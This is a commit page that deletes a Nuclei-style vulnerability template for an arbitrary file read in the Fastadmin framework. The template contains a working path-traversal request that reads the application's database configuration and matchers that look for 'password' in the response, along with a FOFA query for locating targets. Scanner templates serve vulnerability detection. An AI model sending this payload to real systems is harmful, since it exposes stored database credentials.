Delete http/vulnerabilities/other/fastadmin-lfi.yaml
Ritik Chaddha
GitHub
parent
9f2dbb2537
commit
6dc9c67394
|
|
@ -1,39 +0,0 @@
|
||||||
id: fastadmin-lfi
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Fastadmin framework - Arbitrary File Read
|
|
||||||
author: Hel10-Web
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Arbitrary file reading vulnerability exists in Fastadmin framework.
|
|
||||||
reference:
|
|
||||||
- https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
||||||
classification:
|
|
||||||
cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
max-request: 1
|
|
||||||
vendor: fastadmin
|
|
||||||
product: fastadmin
|
|
||||||
fofa-query: app="FASTADMIN-框架"
|
|
||||||
tags: fastadmin,lfi
|
|
||||||
|
|
||||||
http:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/index/ajax/lang?lang=..//..//application/database"
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: body
|
|
||||||
words:
|
|
||||||
- 'jsonpReturn'
|
|
||||||
- 'database'
|
|
||||||
- 'password'
|
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
# digest: 4b0a00483046022100acf527038ff9e2f3bb27626fdc6796d646536911cbad0dd02d9f5d1dfe2c92870221009f36768a1a149ecb4e73eac69e63737e79ba7954e52476743190652bb5031f7c:922c64590222798bb761d5b6d8e72950
|
|
||||||
Loading…
Reference in New Issue